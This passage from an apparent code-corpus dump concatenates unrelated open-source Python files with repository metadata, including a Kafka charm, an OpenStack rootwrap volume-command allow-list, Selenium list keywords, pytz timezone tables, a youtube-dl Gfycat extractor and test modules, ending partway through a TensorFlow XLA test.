"""
Advances the stream to synchronizes to the delimiter token. Used primarily
in relaxed mode parsing.
"""
start_pos = self.position
end_pos = len(self.stream)
match = DELIMITER.search(self.stream, self.position)
if match:
self.position = match.start()
end_pos = match.start()
else:
self.position = end_pos
skip = self.stream[start_pos:end_pos]
if skip.strip() == '':
return None
return skip
def peek(self, token=None):
"""
Peek at the stream to see what the next token is or peek for a
specific token.
"""
# peek at whats next in the stream
if token is None:
if self.position < len(self.stream):
return self.stream[self.position]
else:
return None
# peek for a specific token
else:
match = token.match(self.stream, self.position)
if match:
return self.stream[match.start():match.end()]
return None
| glyph/flanker | flanker/addresslib/tokenizer.py | Python | apache-2.0 | 5,495 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from charmhelpers.core import hookenv
from charmhelpers.core import host
from jujubigdata import utils
from charms.layer.apache_bigtop_base import Bigtop
from charms import layer
from subprocess import check_output
class Kafka(object):
"""
This class manages Kafka.
"""
def __init__(self):
self.dist_config = utils.DistConfig(
data=layer.options('apache-bigtop-base'))
def open_ports(self):
for port in self.dist_config.exposed_ports('kafka'):
hookenv.open_port(port)
def close_ports(self):
for port in self.dist_config.exposed_ports('kafka'):
hookenv.close_port(port)
def configure_kafka(self, zk_units, network_interface=None):
# Get ip:port data from our connected zookeepers
zks = []
for unit in zk_units:
ip = utils.resolve_private_address(unit['host'])
zks.append("%s:%s" % (ip, unit['port']))
zks.sort()
zk_connect = ",".join(zks)
service, unit_num = os.environ['JUJU_UNIT_NAME'].split('/', 1)
kafka_port = self.dist_config.port('kafka')
roles = ['kafka-server']
override = {
'kafka::server::broker_id': unit_num,
'kafka::server::port': kafka_port,
'kafka::server::zookeeper_connection_string': zk_connect,
}
if network_interface:
ip = Bigtop().get_ip_for_interface(network_interface)
override['kafka::server::bind_addr'] = ip
bigtop = Bigtop()
bigtop.render_site_yaml(roles=roles, overrides=override)
bigtop.trigger_puppet()
self.set_advertise()
self.restart()
def restart(self):
self.stop()
self.start()
def start(self):
host.service_start('kafka-server')
def stop(self):
host.service_stop('kafka-server')
def set_advertise(self):
short_host = check_output(['hostname', '-s']).decode('utf8').strip()
# Configure server.properties
# NB: We set the advertised.host.name below to our short hostname
# to kafka (admin will still have to expose kafka and ensure the
# external client can resolve the short hostname to our public ip).
kafka_server_conf = '/etc/kafka/conf/server.properties'
utils.re_edit_in_place(kafka_server_conf, {
r'^#?advertised.host.name=.*': 'advertised.host.name=%s' % short_host,
})
| welikecloud/bigtop | bigtop-packages/src/charm/kafka/layer-kafka/lib/charms/layer/bigtop_kafka.py | Python | apache-2.0 | 3,240 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.rootwrap import filters
filterlist = [
# nova/volume/iscsi.py: iscsi_helper '--op' ...
filters.CommandFilter("/usr/sbin/ietadm", "root"),
filters.CommandFilter("/usr/sbin/tgtadm", "root"),
# nova/volume/driver.py: 'vgs', '--noheadings', '-o', 'name'
filters.CommandFilter("/sbin/vgs", "root"),
# nova/volume/driver.py: 'lvcreate', '-L', sizestr, '-n', volume_name,..
# nova/volume/driver.py: 'lvcreate', '-L', ...
filters.CommandFilter("/sbin/lvcreate", "root"),
# nova/volume/driver.py: 'dd', 'if=%s' % srcstr, 'of=%s' % deststr,...
filters.CommandFilter("/bin/dd", "root"),
# nova/volume/driver.py: 'lvremove', '-f', "%s/%s" % ...
filters.CommandFilter("/sbin/lvremove", "root"),
# nova/volume/driver.py: 'lvdisplay', '--noheading', '-C', '-o', 'Attr',..
filters.CommandFilter("/sbin/lvdisplay", "root"),
# nova/volume/driver.py: 'iscsiadm', '-m', 'discovery', '-t',...
# nova/volume/driver.py: 'iscsiadm', '-m', 'node', '-T', ...
filters.CommandFilter("/sbin/iscsiadm", "root"),
]
| gyang/nova | nova/rootwrap/volume.py | Python | apache-2.0 | 1,754 |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
_BEFORE_IMPORT = tuple(globals())
from grpc import * # pylint: disable=wildcard-import
_AFTER_IMPORT = tuple(globals())
GRPC_ELEMENTS = tuple(
element for element in _AFTER_IMPORT
if element not in _BEFORE_IMPORT and element != '_BEFORE_IMPORT')
| chrisdunelm/grpc | src/python/grpcio_tests/tests/unit/_from_grpc_import_star.py | Python | apache-2.0 | 836 |
# Copyright 2008-2011 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from runonfailure import RunOnFailure
class Select(RunOnFailure):
def get_list_items(self, locator):
"""Returns the values in the list identified by `locator`.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
"""
return self._selenium.get_select_options(locator)
def get_selected_list_value(self, locator):
"""Returns the value of the selected element from the list identified by `locator`.
Return value is read from `value` attribute of the selected element.
Fails if there are zero or more than one selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_value(locator)
def get_selected_list_values(self, locator):
"""Returns the values of selected elements (as a list) from the list identified by `locator`.
Fails if there is no selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_values(locator)
def get_selected_list_label(self, locator):
"""Returns the visible label of the selected element from the list identified by `locator`.
Fails if there are zero or more than one selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_label(locator)
def get_selected_list_labels(self, locator):
"""Returns the visible labels of selected elements (as a list) from the list identified by `locator`.
Fails if there is no selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_labels(locator)
def list_selection_should_be(self, locator, *values):
"""Verifies the selection of list identified by `locator` is exactly `*values`.
If you want to test that no option is selected, simply give no `values`.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
"""
opts = values and 'options [ %s ]' % ' | '.join(values) or 'no options'
self._info("Verifying list '%s' has %s selected." % (locator, opts))
self.page_should_contain_list(locator)
try:
selected_values = self._selenium.get_selected_values(locator)
selected_labels = self._selenium.get_selected_labels(locator)
except Exception, err:
if not values and self._error_contains(err, 'No option selected'):
return
raise
err = "List '%s' should have had selection [ %s ] but it was [ %s ]" \
% (locator, ' | '.join(values), ' | '.join(selected_labels))
for expvalue in values:
if expvalue not in selected_labels + selected_values:
raise AssertionError(err)
for label, value in zip(selected_labels, selected_values):
if label not in values and value not in values:
raise AssertionError(err)
def select_from_list(self, locator, *values):
"""Selects `*values` from list identified by `locator`
If more than one value is given for a single-selection list, the last
value will be selected. If the target list is a multi-selection list,
and `*values` is an empty list, all values of the list will be selected.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword does not support waiting for possible page load
automatically. If that is needed, keyword `Wait Until Page Loaded`
can be used after this keyword.
"""
selection = values and "values '%s'" % ', '.join(values) or 'all values'
self._info("Selecting %s from list '%s'." % (selection, locator))
values = list(values)
if len(values) == 0:
values = self._selenium.get_select_options(locator)
if self._is_multiselect_list(locator):
self._select_from_multiselect_list(locator, values)
else:
self._select_from_singleselect_list(locator, values)
def _select_from_multiselect_list(self, locator, selection):
self._call_method_for_list_elements('add_selection', locator, selection)
def _select_from_singleselect_list(self, locator, selection):
self._call_method_for_list_elements('select', locator, selection)
def _is_multiselect_list(self, locator):
try:
self._selenium.get_attribute(locator+'@multiple')
return True
except Exception, err:
if self._error_contains(err, 'attribute: %s@multiple' % locator):
return False
raise
def _call_method_for_list_elements(self, method_name, locator, elements):
method = getattr(self._selenium, method_name)
for elem in elements:
try:
method(locator, elem)
except:
method(locator, 'value=%s' % elem)
def unselect_from_list(self, locator, *values):
"""Unselects given values from list identified by locator.
As a special case, giving empty list as `*selection` will remove all
selections.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword does not support waiting for possible page load
automatically. If that is needed, keyword `Wait Until Page Loaded`
can be used after this keyword.
"""
selection = values and "values '%s'" % ', '.join(values) or 'all values'
self._info("Unselecting %s from list '%s'." % (selection, locator))
if not self._is_multiselect_list(locator):
raise RuntimeError("Keyword 'Unselect from list' works only for "
"multiselect lists")
if not values:
self._selenium.remove_all_selections(locator)
else:
self._call_method_for_list_elements('remove_selection', locator,
list(values))
def select_all_from_list(self, locator, wait=''):
"""Selects all values from multi-select list identified by `id`.
Key attributes for lists are `id` and `name`. See `introduction` for
details about locating elements and about `wait` argument.
"""
self._info("Selecting all values from list '%s'." % locator)
selected_items = []
if self._selenium.is_something_selected(locator):
selected_items = self._selenium.get_selected_labels(locator)
for item in self._selenium.get_select_options(locator):
if item not in selected_items:
self._add_to_selection(locator, item)
if wait:
self.wait_until_page_loaded()
def _add_to_selection(self, locator, item):
try:
self._selenium.add_selection(locator, item)
except Exception, err:
if self._error_contains(err, "Not a multi-select"):
raise RuntimeError("Keyword 'Select all from list' works only "
"for multiselect lists.")
raise
def list_should_have_no_selections(self, locator):
"""Verifies list identified by `locator` has no selections.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
"""
self._info("Verifying list '%s' has no selection." % locator)
if self._selenium.is_something_selected(locator):
selection = ' | '.join(self._selenium.get_selected_labels(locator))
raise AssertionError("List '%s' should have had no selection "
"(selection was [ %s ])" % (locator, selection))
| ktan2020/legacy-automation | win/Lib/site-packages/SeleniumLibrary/select.py | Python | mit | 9,556 |
"""
Support for EnOcean sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.enocean/
"""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_NAME, CONF_ID)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.components import enocean
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'EnOcean sensor'
DEPENDENCIES = ['enocean']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_ID): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup an EnOcean sensor device."""
dev_id = config.get(CONF_ID)
devname = config.get(CONF_NAME)
add_devices([EnOceanSensor(dev_id, devname)])
class EnOceanSensor(enocean.EnOceanDevice, Entity):
"""Representation of an EnOcean sensor device such as a power meter."""
def __init__(self, dev_id, devname):
"""Initialize the EnOcean sensor device."""
enocean.EnOceanDevice.__init__(self)
self.stype = "powersensor"
self.power = None
self.dev_id = dev_id
self.which = -1
self.onoff = -1
self.devname = devname
@property
def name(self):
"""Return the name of the device."""
return 'Power %s' % self.devname
def value_changed(self, value):
"""Update the internal state of the device."""
self.power = value
self.update_ha_state()
@property
def state(self):
"""Return the state of the device."""
return self.power
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return "W"
| Smart-Torvy/torvy-home-assistant | homeassistant/components/sensor/enocean.py | Python | mit | 1,877 |
'''tzinfo timezone information for Asia/Manila.'''
from pytz.tzinfo import DstTzInfo
from pytz.tzinfo import memorized_datetime as d
from pytz.tzinfo import memorized_ttinfo as i
class Manila(DstTzInfo):
'''Asia/Manila timezone definition. See datetime.tzinfo for details'''
zone = 'Asia/Manila'
_utc_transition_times = [
d(1,1,1,0,0,0),
d(1936,10,31,16,0,0),
d(1937,1,31,15,0,0),
d(1942,4,30,16,0,0),
d(1944,10,31,15,0,0),
d(1954,4,11,16,0,0),
d(1954,6,30,15,0,0),
d(1978,3,21,16,0,0),
d(1978,9,20,15,0,0),
]
_transition_info = [
i(28800,0,'PHT'),
i(32400,3600,'PHST'),
i(28800,0,'PHT'),
i(32400,0,'JST'),
i(28800,0,'PHT'),
i(32400,3600,'PHST'),
i(28800,0,'PHT'),
i(32400,3600,'PHST'),
i(28800,0,'PHT'),
]
Manila = Manila()
| newvem/pytz | pytz/zoneinfo/Asia/Manila.py | Python | mit | 763 |
'''tzinfo timezone information for America/Kentucky/Monticello.'''
from pytz.tzinfo import DstTzInfo
from pytz.tzinfo import memorized_datetime as d
from pytz.tzinfo import memorized_ttinfo as i
class Monticello(DstTzInfo):
'''America/Kentucky/Monticello timezone definition. See datetime.tzinfo for details'''
zone = 'America/Kentucky/Monticello'
_utc_transition_times = [
d(1,1,1,0,0,0),
d(1918,3,31,8,0,0),
d(1918,10,27,7,0,0),
d(1919,3,30,8,0,0),
d(1919,10,26,7,0,0),
d(1942,2,9,8,0,0),
d(1945,8,14,23,0,0),
d(1945,9,30,7,0,0),
d(1968,4,28,8,0,0),
d(1968,10,27,7,0,0),
d(1969,4,27,8,0,0),
d(1969,10,26,7,0,0),
d(1970,4,26,8,0,0),
d(1970,10,25,7,0,0),
d(1971,4,25,8,0,0),
d(1971,10,31,7,0,0),
d(1972,4,30,8,0,0),
d(1972,10,29,7,0,0),
d(1973,4,29,8,0,0),
d(1973,10,28,7,0,0),
d(1974,1,6,8,0,0),
d(1974,10,27,7,0,0),
d(1975,2,23,8,0,0),
d(1975,10,26,7,0,0),
d(1976,4,25,8,0,0),
d(1976,10,31,7,0,0),
d(1977,4,24,8,0,0),
d(1977,10,30,7,0,0),
d(1978,4,30,8,0,0),
d(1978,10,29,7,0,0),
d(1979,4,29,8,0,0),
d(1979,10,28,7,0,0),
d(1980,4,27,8,0,0),
d(1980,10,26,7,0,0),
d(1981,4,26,8,0,0),
d(1981,10,25,7,0,0),
d(1982,4,25,8,0,0),
d(1982,10,31,7,0,0),
d(1983,4,24,8,0,0),
d(1983,10,30,7,0,0),
d(1984,4,29,8,0,0),
d(1984,10,28,7,0,0),
d(1985,4,28,8,0,0),
d(1985,10,27,7,0,0),
d(1986,4,27,8,0,0),
d(1986,10,26,7,0,0),
d(1987,4,5,8,0,0),
d(1987,10,25,7,0,0),
d(1988,4,3,8,0,0),
d(1988,10,30,7,0,0),
d(1989,4,2,8,0,0),
d(1989,10,29,7,0,0),
d(1990,4,1,8,0,0),
d(1990,10,28,7,0,0),
d(1991,4,7,8,0,0),
d(1991,10,27,7,0,0),
d(1992,4,5,8,0,0),
d(1992,10,25,7,0,0),
d(1993,4,4,8,0,0),
d(1993,10,31,7,0,0),
d(1994,4,3,8,0,0),
d(1994,10,30,7,0,0),
d(1995,4,2,8,0,0),
d(1995,10,29,7,0,0),
d(1996,4,7,8,0,0),
d(1996,10,27,7,0,0),
d(1997,4,6,8,0,0),
d(1997,10,26,7,0,0),
d(1998,4,5,8,0,0),
d(1998,10,25,7,0,0),
d(1999,4,4,8,0,0),
d(1999,10,31,7,0,0),
d(2000,4,2,8,0,0),
d(2000,10,29,7,0,0),
d(2001,4,1,7,0,0),
d(2001,10,28,6,0,0),
d(2002,4,7,7,0,0),
d(2002,10,27,6,0,0),
d(2003,4,6,7,0,0),
d(2003,10,26,6,0,0),
d(2004,4,4,7,0,0),
d(2004,10,31,6,0,0),
d(2005,4,3,7,0,0),
d(2005,10,30,6,0,0),
d(2006,4,2,7,0,0),
d(2006,10,29,6,0,0),
d(2007,3,11,7,0,0),
d(2007,11,4,6,0,0),
d(2008,3,9,7,0,0),
d(2008,11,2,6,0,0),
d(2009,3,8,7,0,0),
d(2009,11,1,6,0,0),
d(2010,3,14,7,0,0),
d(2010,11,7,6,0,0),
d(2011,3,13,7,0,0),
d(2011,11,6,6,0,0),
d(2012,3,11,7,0,0),
d(2012,11,4,6,0,0),
d(2013,3,10,7,0,0),
d(2013,11,3,6,0,0),
d(2014,3,9,7,0,0),
d(2014,11,2,6,0,0),
d(2015,3,8,7,0,0),
d(2015,11,1,6,0,0),
d(2016,3,13,7,0,0),
d(2016,11,6,6,0,0),
d(2017,3,12,7,0,0),
d(2017,11,5,6,0,0),
d(2018,3,11,7,0,0),
d(2018,11,4,6,0,0),
d(2019,3,10,7,0,0),
d(2019,11,3,6,0,0),
d(2020,3,8,7,0,0),
d(2020,11,1,6,0,0),
d(2021,3,14,7,0,0),
d(2021,11,7,6,0,0),
d(2022,3,13,7,0,0),
d(2022,11,6,6,0,0),
d(2023,3,12,7,0,0),
d(2023,11,5,6,0,0),
d(2024,3,10,7,0,0),
d(2024,11,3,6,0,0),
d(2025,3,9,7,0,0),
d(2025,11,2,6,0,0),
d(2026,3,8,7,0,0),
d(2026,11,1,6,0,0),
d(2027,3,14,7,0,0),
d(2027,11,7,6,0,0),
d(2028,3,12,7,0,0),
d(2028,11,5,6,0,0),
d(2029,3,11,7,0,0),
d(2029,11,4,6,0,0),
d(2030,3,10,7,0,0),
d(2030,11,3,6,0,0),
d(2031,3,9,7,0,0),
d(2031,11,2,6,0,0),
d(2032,3,14,7,0,0),
d(2032,11,7,6,0,0),
d(2033,3,13,7,0,0),
d(2033,11,6,6,0,0),
d(2034,3,12,7,0,0),
d(2034,11,5,6,0,0),
d(2035,3,11,7,0,0),
d(2035,11,4,6,0,0),
d(2036,3,9,7,0,0),
d(2036,11,2,6,0,0),
d(2037,3,8,7,0,0),
d(2037,11,1,6,0,0),
]
_transition_info = [
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CWT'),
i(-18000,3600,'CPT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
]
Monticello = Monticello()
| newvem/pytz | pytz/zoneinfo/America/Kentucky/Monticello.py | Python | mit | 6,463 |
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
float_or_none,
qualities,
)
class GfycatIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?gfycat\.com/(?P<id>[^/?#]+)'
_TEST = {
'url': 'http://gfycat.com/DeadlyDecisiveGermanpinscher',
'info_dict': {
'id': 'DeadlyDecisiveGermanpinscher',
'ext': 'mp4',
'title': 'Ghost in the Shell',
'timestamp': 1410656006,
'upload_date': '20140914',
'uploader': 'anonymous',
'duration': 10.4,
'view_count': int,
'like_count': int,
'dislike_count': int,
'categories': list,
'age_limit': 0,
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
gfy = self._download_json(
'http://gfycat.com/cajax/get/%s' % video_id,
video_id, 'Downloading video info')['gfyItem']
title = gfy.get('title') or gfy['gfyName']
description = gfy.get('description')
timestamp = int_or_none(gfy.get('createDate'))
uploader = gfy.get('userName')
view_count = int_or_none(gfy.get('views'))
like_count = int_or_none(gfy.get('likes'))
dislike_count = int_or_none(gfy.get('dislikes'))
age_limit = 18 if gfy.get('nsfw') == '1' else 0
width = int_or_none(gfy.get('width'))
height = int_or_none(gfy.get('height'))
fps = int_or_none(gfy.get('frameRate'))
num_frames = int_or_none(gfy.get('numFrames'))
duration = float_or_none(num_frames, fps) if num_frames and fps else None
categories = gfy.get('tags') or gfy.get('extraLemmas') or []
FORMATS = ('gif', 'webm', 'mp4')
quality = qualities(FORMATS)
formats = []
for format_id in FORMATS:
video_url = gfy.get('%sUrl' % format_id)
if not video_url:
continue
filesize = gfy.get('%sSize' % format_id)
formats.append({
'url': video_url,
'format_id': format_id,
'width': width,
'height': height,
'fps': fps,
'filesize': filesize,
'quality': quality(format_id),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'timestamp': timestamp,
'uploader': uploader,
'duration': duration,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'categories': categories,
'age_limit': age_limit,
'formats': formats,
}
| apllicationCOM/youtube-dl-api-server | youtube_dl_server/youtube_dl/extractor/gfycat.py | Python | unlicense | 2,868 |
import unittest
import os
from os.path import abspath, join
from robot.running.importer import ImportCache
from robot.errors import FrameworkError
from robot.utils.asserts import assert_equal, assert_true, assert_raises
from robot.utils import normpath
class TestImportCache(unittest.TestCase):
def setUp(self):
self.cache = ImportCache()
self.cache[('lib', ['a1', 'a2'])] = 'Library'
self.cache['res'] = 'Resource'
def test_add_item(self):
assert_equal(self.cache._keys, [('lib', ['a1', 'a2']), 'res'])
assert_equal(self.cache._items, ['Library', 'Resource'])
def test_overwrite_item(self):
self.cache['res'] = 'New Resource'
assert_equal(self.cache['res'], 'New Resource')
assert_equal(self.cache._keys, [('lib', ['a1', 'a2']), 'res'])
assert_equal(self.cache._items, ['Library', 'New Resource'])
def test_get_existing_item(self):
assert_equal(self.cache['res'], 'Resource')
assert_equal(self.cache[('lib', ['a1', 'a2'])], 'Library')
assert_equal(self.cache[('lib', ['a1', 'a2'])], 'Library')
assert_equal(self.cache['res'], 'Resource')
def test_contains_item(self):
assert_true(('lib', ['a1', 'a2']) in self.cache)
assert_true('res' in self.cache)
assert_true(('lib', ['a1', 'a2', 'wrong']) not in self.cache)
assert_true('nonex' not in self.cache)
def test_get_non_existing_item(self):
assert_raises(KeyError, self.cache.__getitem__, 'nonex')
assert_raises(KeyError, self.cache.__getitem__, ('lib1', ['wrong']))
def test_invalid_key(self):
assert_raises(FrameworkError, self.cache.__setitem__, ['inv'], None)
def test_existing_absolute_paths_are_normalized(self):
cache = ImportCache()
path = join(abspath('.'), '.', os.listdir('.')[0])
value = object()
cache[path] = value
assert_equal(cache[path], value)
assert_equal(cache._keys[0], normpath(path, case_normalize=True))
def test_existing_non_absolute_paths_are_not_normalized(self):
cache = ImportCache()
path = os.listdir('.')[0]
value = object()
cache[path] = value
assert_equal(cache[path], value)
assert_equal(cache._keys[0], path)
def test_non_existing_absolute_paths_are_not_normalized(self):
cache = ImportCache()
path = join(abspath('.'), '.', 'NonExisting.file')
value = object()
cache[path] = value
assert_equal(cache[path], value)
assert_equal(cache._keys[0], path)
if __name__ == '__main__':
unittest.main()
| alexandrul-ci/robotframework | utest/running/test_importer.py | Python | apache-2.0 | 2,640 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for XLA op wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.compiler.tf2xla.python import xla
from tensorflow.compiler.xla import xla_data_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
class XlaOpsTest(xla_test.XLATestCase, parameterized.TestCase):
def _assertOpOutputMatchesExpected(self, op, args, expected,
equality_fn=None):
with self.test_session() as session:
with self.test_scope():
placeholders = [
array_ops.placeholder(dtypes.as_dtype(arg.dtype), arg.shape)
for arg in args
]
feeds = {placeholders[i]: args[i] for i in range(0, len(args))}
output = op(*placeholders)
result = session.run(output, feeds)
if not equality_fn:
equality_fn = self.assertAllClose
equality_fn(result, expected, rtol=1e-3)
def testAdd(self):
for dtype in self.numeric_types:
self._assertOpOutputMatchesExpected(
xla.add,
args=(np.array([1, 2, 3], dtype=dtype),
np.array([4, 5, 6], dtype=dtype)),
expected=np.array([5, 7, 9], dtype=dtype))
self._assertOpOutputMatchesExpected(
lambda x, y: xla.add(x, y, broadcast_dims=(0,)),
args=(np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([7, 11], dtype=dtype)),
expected=np.array([[8, 9], [14, 15]], dtype=dtype))
self._assertOpOutputMatchesExpected(
lambda x, y: xla.add(x, y, broadcast_dims=(1,)),
args=(np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([7, 11], dtype=dtype)),
